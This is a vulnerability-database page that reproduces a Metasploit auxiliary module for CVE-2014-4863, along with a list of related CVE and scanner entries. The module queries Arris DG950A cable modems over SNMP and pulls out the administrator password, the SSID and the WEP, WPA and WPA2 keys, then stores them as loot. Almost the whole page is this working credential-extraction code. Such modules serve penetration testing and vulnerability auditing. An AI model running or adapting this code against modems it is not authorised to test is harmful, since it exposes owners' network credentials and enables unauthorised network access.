Vulners
Lucene search
Arris DG950A Cable Modem Wifi Enumeration
🗓️ 31 Aug 2024 00:00:00Reported by Jay Turla, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 196 Views
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | ARRIS Touchstone DG950A SNMP Information Disclosure (CVE-2014-4863) | 7 Nov 201400:00 | – | nessus |
 | CVE-2014-4863 | 29 May 201815:50 | – | circl |
 | CVE-2014-4862 | 5 Sep 201417:00 | – | cve |
| CVE-2014-4863 | 5 Sep 201417:00 | – | cve |
 | CVE-2014-4862 | 5 Sep 201417:00 | – | cvelist |
| CVE-2014-4863 | 5 Sep 201417:00 | – | cvelist |
 | Arris DG950A Cable Modem Wifi Enumeration | 8 Sep 201415:04 | – | metasploit |
 | CVE-2014-4862 | 5 Sep 201417:55 | – | nvd |
| CVE-2014-4863 | 5 Sep 201417:55 | – | nvd |
 | Report default community names of the SNMP Agent | 12 Mar 201400:00 | – | openvas |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SNMPClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Arris DG950A Cable Modem Wifi Enumeration',
'Description' => %q{
This module will extract WEP keys and WPA preshared keys from
Arris DG950A cable modems.
},
'References' =>
[
['CVE','2014-4863'],
['URL', 'https://www.rapid7.com/blog/post/2014/08/21/more-snmp-information-leaks-cve-2014-4862-and-cve-2014-4863/']
],
'Author' => ['Deral "Percent_X" Heiland'],
'License' => MSF_LICENSE
)
end
def run_host(ip)
snmp = connect_snmp
if snmp.get_value('sysDescr.0') =~ /DG950A/
print_line("#{ip}")
# System Admin Password
wifi_info = ''
password = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0')
print_line("Password: #{password}")
wifi_info << "Password: #{password}" << "\n"
else
fail_with(Failure::NoTarget, "Does not appear to be an Arris DG950A")
end
# check WPA Encryption Algorithm
encrypt_type = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.26.1.1.12')
case encrypt_type
when 1
wpa_encrypt = "TKIP"
when 2
wpa_encrypt = "AES"
when 3
wpa_encrypt = "TKIP/AES"
else
wpa_encrypt = "Unknown"
end
# Wifi Status
wifi_status = snmp.get_value('1.3.6.1.2.1.2.2.1.8.12')
if wifi_status == '1'
ssid = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.22.1.2.12')
print_line("SSID: #{ssid}")
wifi_info << "SSID: #{ssid}" << "\n"
# Wifi Security Settings
wifi_version = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.22.1.5.12')
if wifi_version == '0'
print_line('Open Access Wifi is Enabled')
wifi_info << 'Open Access WIFI is Enabled' << '\n'
# WEP enabled
elsif wifi_version == '1'
wep_type = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.23.1.2.12')
case wep_type
when 1
oid = "1.3.6.1.4.1.4115.1.20.1.1.3.24.1.2.12"
when 2
oid = "1.3.6.1.4.1.4115.1.20.1.1.3.25.1.2.12"
else
print_line('FAILED')
end
wepkey1 = snmp.get_value("#{oid}.1")
key1 = "#{wepkey1}"
print_line("WEP KEY1: #{key1}")
wifi_info << "WEP KEY1: #{key1}" << "\n"
wepkey2 = snmp.get_value("#{oid}.2")
key2 = "#{wepkey2}"
print_line("WEP KEY2: #{key2}")
wifi_info << "WEP KEY2: #{key2}" << "\n"
wepkey3 = snmp.get_value("#{oid}.3")
key3 = "#{wepkey3}"
print_line("WEP KEY3: #{key3}")
wifi_info << "WEP KEY3: #{key3}" << "\n"
wepkey4 = snmp.get_value("#{oid}.4")
key4 = "#{wepkey4}"
print_line("WEP KEY4: #{key4}")
wifi_info << "WEP KEY4: #{key4}" << "\n"
# WPA enabled
elsif wifi_version == '2'
wpapsk = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.26.1.2.12')
print_line("WPA PSK: #{wpapsk}")
print_line("WPA Encryption: #{wpa_encrypt}")
wifi_info << "WPA PSK: #{wpapsk}" << "\n"
wifi_info << "WPA Encryption #{wpa_encrypt}" << "\n"
# WPA2 enabled
elsif wifi_version == '3'
wpapsk2 = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.26.1.2.12')
print_line("WPA2 PSK: #{wpapsk2}")
print_line("WPA2 Encryption: #{wpa_encrypt}")
wifi_info << "WPA2 PSK: #{wpapsk2}" << "\n"
wifi_info << "WPA2 Encryption: #{wpa_encrypt}" << "\n"
# WPA/WPA2 enabled
elsif wifi_version == '7'
wpawpa2psk = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.26.1.2.12')
print_line("WPA/WPA2 PSK: #{wpawpa2psk}")
print_line("WPA/WPA2 Encryption: #{wpa_encrypt}")
wifi_info << "WPA/WPA2 PSK: #{wpawpa2psk}" << "\n"
wifi_info << "WPA/WPA2 Encryption: #{wpa_encrypt}" << "\n"
else
print_line('FAILED')
end
else
print_line('WIFI is not enabled')
end
# Woot we got loot.
loot_name = 'arris_wifi'
loot_type = 'text/plain'
loot_filename = 'arris_wifi.text'
loot_desc = 'Arris DG950A Wifi configuration data'
p = store_loot(loot_name, loot_type, datastore['RHOST'], wifi_info, loot_filename, loot_desc)
print_good("WiFi Data saved in: #{p}")
# No need to make noise
rescue ::SNMP::UnsupportedVersion
rescue ::SNMP::RequestTimeout
raise $ERROR_INFO
rescue ::Exception => e
print_error("#{ip} error: #{e.class} #{e.message}")
disconnect_snmp
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 25
EPSS0.70444